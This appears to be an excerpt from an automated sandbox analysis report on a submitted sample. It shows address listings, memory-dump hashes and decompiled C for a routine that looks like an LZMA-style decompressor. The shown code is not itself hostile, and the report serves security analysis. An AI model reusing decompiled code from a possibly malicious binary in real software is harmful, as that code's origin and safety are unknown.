                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732e
                                                                                    0x0040732e
                                                                                    0x00407331
                                                                                    0x00407333
                                                                                    0x004075bd
                                                                                    0x00000000
                                                                                    0x004075bd
                                                                                    0x00407339
                                                                                    0x0040733c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407342
                                                                                    0x00407346
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00000000
                                                                                    0x00407349
                                                                                    0x004071c7
                                                                                    0x004071c9
                                                                                    0x004071cb
                                                                                    0x004071cd
                                                                                    0x004071d0
                                                                                    0x004071d1
                                                                                    0x004071d3
                                                                                    0x004071d5
                                                                                    0x004071d8
                                                                                    0x004071db
                                                                                    0x004071f1
                                                                                    0x004071f6
                                                                                    0x0040722e
                                                                                    0x0040722e
                                                                                    0x00407232
                                                                                    0x0040725e
                                                                                    0x00407260
                                                                                    0x00407267
                                                                                    0x0040726a
                                                                                    0x0040726d
                                                                                    0x0040726d
                                                                                    0x00407272
                                                                                    0x00407272
                                                                                    0x00407274
                                                                                    0x00407277
                                                                                    0x0040727e
                                                                                    0x00407281
                                                                                    0x004072ae
                                                                                    0x004072ae
                                                                                    0x004072b1
                                                                                    0x004072b4
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00000000
                                                                                    0x00407328
                                                                                    0x004072b6
                                                                                    0x004072bc
                                                                                    0x004072bf
                                                                                    0x004072c2
                                                                                    0x004072c5
                                                                                    0x004072c8
                                                                                    0x004072cb
                                                                                    0x004072ce
                                                                                    0x004072d1
                                                                                    0x004072d4
                                                                                    0x004072d7
                                                                                    0x004072f0
                                                                                    0x004072f2
                                                                                    0x004072f5
                                                                                    0x004072f6
                                                                                    0x004072f9
                                                                                    0x004072fb
                                                                                    0x004072fe
                                                                                    0x00407300
                                                                                    0x00407302
                                                                                    0x00407305
                                                                                    0x00407307
                                                                                    0x0040730a
                                                                                    0x0040730e
                                                                                    0x00407310
                                                                                    0x00407310
                                                                                    0x00407311
                                                                                    0x00407314
                                                                                    0x00407317
                                                                                    0x004072d9
                                                                                    0x004072d9
                                                                                    0x004072e1
                                                                                    0x004072e6
                                                                                    0x004072e8
                                                                                    0x004072eb
                                                                                    0x004072eb
                                                                                    0x0040731a
                                                                                    0x00407321
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00407321
                                                                                    0x00407234
                                                                                    0x00407237
                                                                                    0x00407239
                                                                                    0x0040723c
                                                                                    0x0040723f
                                                                                    0x00407242
                                                                                    0x00407244
                                                                                    0x00407247
                                                                                    0x0040724a
                                                                                    0x0040724a
                                                                                    0x0040724d
                                                                                    0x0040724d
                                                                                    0x00407250
                                                                                    0x00407257
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00407257
                                                                                    0x004071dd
                                                                                    0x004071e0
                                                                                    0x004071e2
                                                                                    0x004071e5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f44
                                                                                    0x00406f44
                                                                                    0x00406f48
                                                                                    0x0040758d
                                                                                    0x00000000
                                                                                    0x0040758d
                                                                                    0x00406f4e
                                                                                    0x00406f51
                                                                                    0x00406f54
                                                                                    0x00406f57
                                                                                    0x00406f5a
                                                                                    0x00406f5d
                                                                                    0x00406f60
                                                                                    0x00406f62
                                                                                    0x00406f65
                                                                                    0x00406f68
                                                                                    0x00406f6b
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x00407350
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407356
                                                                                    0x00407359
                                                                                    0x0040735c
                                                                                    0x0040735f
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407364
                                                                                    0x00407367
                                                                                    0x0040736a
                                                                                    0x0040736d
                                                                                    0x00407370
                                                                                    0x00407373
                                                                                    0x00407374
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407379
                                                                                    0x0040737c
                                                                                    0x0040737f
                                                                                    0x00407382
                                                                                    0x00407385
                                                                                    0x00407389
                                                                                    0x0040738b
                                                                                    0x0040738e
                                                                                    0x00000000
                                                                                    0x00407390
                                                                                    0x00000000
                                                                                    0x00407390
                                                                                    0x0040738e
                                                                                    0x004075c3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bf2

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                    • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                                                    • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                    • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00406BB0 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 98%
                                                                                    			E00406BB0(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
